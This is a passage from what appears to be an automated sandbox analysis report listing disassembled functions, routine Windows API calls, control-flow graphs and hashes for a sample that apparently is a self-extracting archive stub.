                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1868215902-0
                                                                                      • Opcode ID: 0cbfa0c043a91d607cc33c11ca46dd26440c869c14d8a035dac7912c2822a001
                                                                                      • Instruction ID: 7071da7ed9a07620c3945c89a9e65343ecd4cdbbc5cdf00c7ce53712729a2e80
                                                                                      • Opcode Fuzzy Hash: 0cbfa0c043a91d607cc33c11ca46dd26440c869c14d8a035dac7912c2822a001
                                                                                      • Instruction Fuzzy Hash: 1B014C32440744EFCB319B68DD85B86BBAAFB46710F00852AF29E92664DB716804CB71
                                                                                      Function 00D88FC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 896 d88fc8-d88fe7 GetClassNameW 897 d88fe9-d88ffe call d80b12 896->897 898 d8900f-d89011 896->898 903 d8900e 897->903 904 d89000-d8900c FindWindowExW 897->904 899 d8901c-d89020 898->899 900 d89013-d89016 SHAutoComplete 898->900 900->899 903->898 904->903
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000050), ref: 00D88FDF
                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 00D89016
                                                                                        • Part of subcall function 00D80B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7AC49,?,?,?,00D7ABF8,?,-00000002,?,00000000,?), ref: 00D80B28
                                                                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00D89006
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                      • String ID: EDIT
                                                                                      • API String ID: 4243998846-3080729518
                                                                                      • Opcode ID: ae366f1d7ee2739f584c256e53f7e59c1a7cf5e270ec2c51d779bcd8391ba861
                                                                                      • Instruction ID: 1aa7889bad02b8a1494d41aa4616a91e8d984bc91a6f981de96db47587009cfc
                                                                                      • Opcode Fuzzy Hash: ae366f1d7ee2739f584c256e53f7e59c1a7cf5e270ec2c51d779bcd8391ba861
                                                                                      • Instruction Fuzzy Hash: C9F0893260132867EB306A655C05FAB77AC9B46B11F080165B940F2281D7609D01C7F6
                                                                                      Function 00D8BE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 905 d8be0a-d8be35 call d8cec0 SetEnvironmentVariableW call d7ef07 909 d8be3a-d8be3e 905->909 910 d8be40-d8be44 909->910 911 d8be62-d8be66 909->911 912 d8be4d-d8be54 call d7effe 910->912 915 d8be46-d8be4c 912->915 916 d8be56-d8be5c SetEnvironmentVariableW 912->916 915->912 916->911
                                                                                      APIs
                                                                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D8BE20
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D8BE5C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentVariable
                                                                                      • String ID: sfxcmd$sfxpar
                                                                                      • API String ID: 1431749950-3493335439
                                                                                      • Opcode ID: 37cd7dd425e9048af42d46ce79df732f84012b30632438a1b58c37f80dfadd13
                                                                                      • Instruction ID: c3dc8b21663de4c5e4ae0631348c4fbd5d0ea54401663df8e857dd40c4930c43
                                                                                      • Opcode Fuzzy Hash: 37cd7dd425e9048af42d46ce79df732f84012b30632438a1b58c37f80dfadd13
                                                                                      • Instruction Fuzzy Hash: 19F0A072811324AEC7223F949C09EFABB98EF09B61F044092FD88D6241E7649C80C7B0
                                                                                      Function 00D7973D Relevance: 6.1, APIs: 4, Instructions: 99fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 917 d7973d-d7975e call d8cec0 920 d79767 917->920 921 d79760-d79765 917->921 922 d79769-d79786 920->922 921->920 921->922 923 d7978e-d79798 922->923 924 d79788 922->924 925 d7979d-d797c8 CreateFileW 923->925 926 d7979a 923->926 924->923 927 d7982c-d79841 925->927 928 d797ca-d797ec GetLastError call d7b275 925->928 926->925 929 d79843-d79856 call d7f10e 927->929 930 d7985b-d79866 927->930 934 d797ee-d79810 CreateFileW GetLastError 928->934 935 d7981b-d79820 928->935 929->930 936 d79816-d79819 934->936 937 d79812 934->937 935->927 938 d79822 935->938 936->927 936->935 937->936 938->927
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,00D7777A,?,00000005,?,00000011), ref: 00D797BD
                                                                                      • GetLastError.KERNEL32(?,?,00D7777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D797CA
                                                                                      • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00D7777A,?,00000005,?), ref: 00D797FF
                                                                                      • GetLastError.KERNEL32(?,?,00D7777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D79807
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 1e6e6e34ec2d41804cf43bcd13db3a07f87d39b456918bc08f56da3a665d0cc2
                                                                                      • Instruction ID: cba1aa0ba2f41c3d879239d21ce6c7be83aed47f751527bae9cc25b21adce7df
                                                                                      • Opcode Fuzzy Hash: 1e6e6e34ec2d41804cf43bcd13db3a07f87d39b456918bc08f56da3a665d0cc2
                                                                                      • Instruction Fuzzy Hash: 223154728403556FE3209F248C05BE6BBA4FB46320F048629F994872D1E3759888CBB1
                                                                                      Function 00D79613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00D79623
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00D7963B
                                                                                      • GetLastError.KERNEL32 ref: 00D7966D
                                                                                      • GetLastError.KERNEL32 ref: 00D7968C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileHandleRead
                                                                                      • String ID:
                                                                                      • API String ID: 2244327787-0
                                                                                      • Opcode ID: 35fca890dfba21cb3d557a57dcf88439e69d488e8b971d861d98d27f3469628d
                                                                                      • Instruction ID: dbca83e271dca2f189283d78c068d0c54742d50495cebcb8cdde9a2d5dd7f43a
                                                                                      • Opcode Fuzzy Hash: 35fca890dfba21cb3d557a57dcf88439e69d488e8b971d861d98d27f3469628d
                                                                                      • Instruction Fuzzy Hash: 4D115A32500204ABCF205F61C824A6EBBA9EB06331F14C62AF9AEC5290E736CD409F75
                                                                                      Function 00D977D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D92213,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue), ref: 00D97803
                                                                                      • GetLastError.KERNEL32(?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000,00000364,?,00D963F1), ref: 00D9780F
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D97778,00D92213,00000000,00000000,00000000,?,00D97975,00000006,FlsSetValue,00DA3768,00DA3770,00000000), ref: 00D9781D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 3177248105-0
                                                                                      • Opcode ID: e4a000f299db7e9fc0f33b2eb0db56069837b4ca8a27459b30cade61d3011288
                                                                                      • Instruction ID: 3d50209b84c3d5cfd667b6b87099f756cacff86d20f46a871651365fc2429521
                                                                                      • Opcode Fuzzy Hash: e4a000f299db7e9fc0f33b2eb0db56069837b4ca8a27459b30cade61d3011288
                                                                                      • Instruction Fuzzy Hash: 0D01A7367293239BCB614B799C48E6A7B98EF457B1B140620FA46D7340D720D901C6F0
                                                                                      Function 00D8991E Relevance: 6.0, APIs: 4, Instructions: 30windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D8992F
                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D89940
                                                                                      • TranslateMessage.USER32(?), ref: 00D8994A
                                                                                      • DispatchMessageW.USER32(?), ref: 00D89954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4217535847-0
                                                                                      • Opcode ID: a4f55f65a15f849aa913c5103be7f9bcc76855dbba937c445044af8db658f8ab
                                                                                      • Instruction ID: 17e92c83001e5ae3a3f3e4bf556d7b1662ff6e8e5463005047ab91b020377dbc
                                                                                      • Opcode Fuzzy Hash: a4f55f65a15f849aa913c5103be7f9bcc76855dbba937c445044af8db658f8ab
                                                                                      • Instruction Fuzzy Hash: 63E0ED72C0222EA78B20ABEAAC4CCEFBFACEE072657004115B519D2100D7789505CBF1
                                                                                      Function 00D98618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00D981EB: GetOEMCP.KERNEL32(00000000,?,?,00D98474,?), ref: 00D98216
                                                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D984B9,?,00000000), ref: 00D9868C
                                                                                      • GetCPInfo.KERNEL32(00000000,00D984B9,?,?,?,00D984B9,?,00000000), ref: 00D9869F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CodeInfoPageValid
                                                                                      • String ID: d0F
                                                                                      • API String ID: 546120528-1238022483
                                                                                      • Opcode ID: b1c73db3a20c6df08befe536d678216721c4a5f96e70eee1f09d737ebc6b2344
                                                                                      • Instruction ID: bcaa786f391418155c59dabe32bfa53a5ddd9bf12b027fba37dadec099fd576b
                                                                                      • Opcode Fuzzy Hash: b1c73db3a20c6df08befe536d678216721c4a5f96e70eee1f09d737ebc6b2344
                                                                                      • Instruction Fuzzy Hash: A9512570A003459EDF219FB5C881ABABBE5EF43B10F28446ED0968B251DF35D945EBB0
                                                                                      Function 00D982C3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D982E8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $d0F
                                                                                      • API String ID: 1807457897-1605285952
                                                                                      • Opcode ID: ef5f39786f8deb961ad7e7dc66bdb75cd774c351546bddd6b7bc21d7695d398f
                                                                                      • Instruction ID: 763400407378265f076f896a83138b0e14933f17244e7ec00ec2438fc76f315f
                                                                                      • Opcode Fuzzy Hash: ef5f39786f8deb961ad7e7dc66bdb75cd774c351546bddd6b7bc21d7695d398f
                                                                                      • Instruction Fuzzy Hash: 6F411A7050434C9ADF218E28CC84AFABBEADF46B04F5804EDE5CAC6142D6359945EF70
                                                                                      Function 00D97735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00D97795
                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D977A2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                      • String ID: d0F
                                                                                      • API String ID: 2279764990-1238022483
                                                                                      • Opcode ID: 1a1e5a597941b5461340148e4e05d1a69e3519b1cf8116c40bc345611f8d33d8
                                                                                      • Instruction ID: cf7d9a78579d90934724dc860d04cd61708553761bf61161398df34dcf88e368
                                                                                      • Opcode Fuzzy Hash: 1a1e5a597941b5461340148e4e05d1a69e3519b1cf8116c40bc345611f8d33d8
                                                                                      • Instruction Fuzzy Hash: 5011A337A14321AB9F259FACEC819AA7395EB85720B1A0220ED15EB354D731DC4187F1
                                                                                      Function 00D7FBB1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 00D7FBD5
                                                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00D7FC1C
                                                                                        • Part of subcall function 00D76DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D76DF1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                      • String ID: CreateThread failed
                                                                                      • API String ID: 2655393344-3849766595
                                                                                      • Opcode ID: fc9e5c47fe559388a17c8701b488201326e296bd2cc527184406d6eac3279f7c
                                                                                      • Instruction ID: 928fff6175c028c0a4ecc434f2df5f02d57b8c6d7254cf8f2567807afcd950e1
                                                                                      • Opcode Fuzzy Hash: fc9e5c47fe559388a17c8701b488201326e296bd2cc527184406d6eac3279f7c
                                                                                      • Instruction Fuzzy Hash: 3C01D6713443096FD2306F58DC82F667799EB46721F10443EF946D2280EAE2A8458631
                                                                                      Function 00D97A09 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00D97A7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: String
                                                                                      • String ID: LCMapStringEx$d0F
                                                                                      • API String ID: 2568140703-2145499720
                                                                                      • Opcode ID: 181b859a829bf4545e3ad02a4926922b8c25cac83eccf838ec0920e4e3e07547
                                                                                      • Instruction ID: a05e4cce0d7b85b8733abd526a301ca7133cf83aa148bccd2bdc2ba5f604244b
                                                                                      • Opcode Fuzzy Hash: 181b859a829bf4545e3ad02a4926922b8c25cac83eccf838ec0920e4e3e07547
                                                                                      • Instruction Fuzzy Hash: 68012572500209BBCF02AF90DC06EEE7F62EF49710F104114FE0965260CA32DA31EBA4
                                                                                      Function 00D979A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D9709A), ref: 00D979F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1711643710.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1711612123.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711695017.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711723368.0000000000DCA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1711982855.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
